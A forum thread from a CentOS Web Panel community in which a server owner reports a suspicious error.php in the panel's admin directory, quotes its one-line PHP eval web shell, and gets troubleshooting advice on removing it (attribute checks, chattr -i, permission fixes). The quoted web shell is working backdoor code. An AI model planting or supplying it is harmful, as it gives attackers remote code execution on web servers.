Author Topic: Cannot Delete File  (Read 20 times)

0 Members and 1 Guest are viewing this topic.

Offline
*
Cannot Delete File
« on: July 17, 2025, 12:18:47 AM »
On my server running CWP, I recently found a file located in `/usr/local/cwpsrv/htdocs/admin/admin` called `error.php` that just has the contents `<?php @eval($_POST['shell']);?>` (very concerning).

Code: [Select]
whoami returns `root`.

Code: [Select]
rm -rf error.phpreturns “Permission denied.”

Code: [Select]
lsattr error.php returns `-------------e-- error.php`.

Code: [Select]
getfacl error.php returns:
```
# file: error.php
# owner: root
# group: root
user::rwx
group::r-x
other::r-x
```

Code: [Select]
mount | grep "$(df error.php | tail -1 | awk '{print $1}')" Returns:

`/dev/mapper/centos_centos7-root on / type ext4 (rw,relatime,data=ordered)`

This file was obviously not included with the standard cwpsrv files. What else can I do to delete this file?

Offline
*****
Re: Cannot Delete File
« Reply #1 on: July 17, 2025, 12:44:52 AM »
Not present on any servers I manage (one CentOS 7.9 holdout, a couple of AlmaLinux 8 servers, a couple of AL9 test beds).
Try to see if the immutable bit is set, then remove:
Code: [Select]
chattr -i error.php
rm -rf error.php

Offline
*
Re: Cannot Delete File
« Reply #2 on: July 17, 2025, 01:07:43 AM »
That did not work. I have remove the I(mmutable) and e(xtent) flags. lsattr returns --------------.

Offline
*****
Re: Cannot Delete File
« Reply #3 on: Today at 04:18:03 AM »
Ditto to what @overseer posted.

On our AL9 servers, there is no error.php in usr/local/cwpsrv/htdocs/admin/admin

1 other thing you can try is goto User Accounts -> Fix Permissions -> Select User (nobody), click on all 3 boxes, and then the blue bar 'Fix Selected Issues'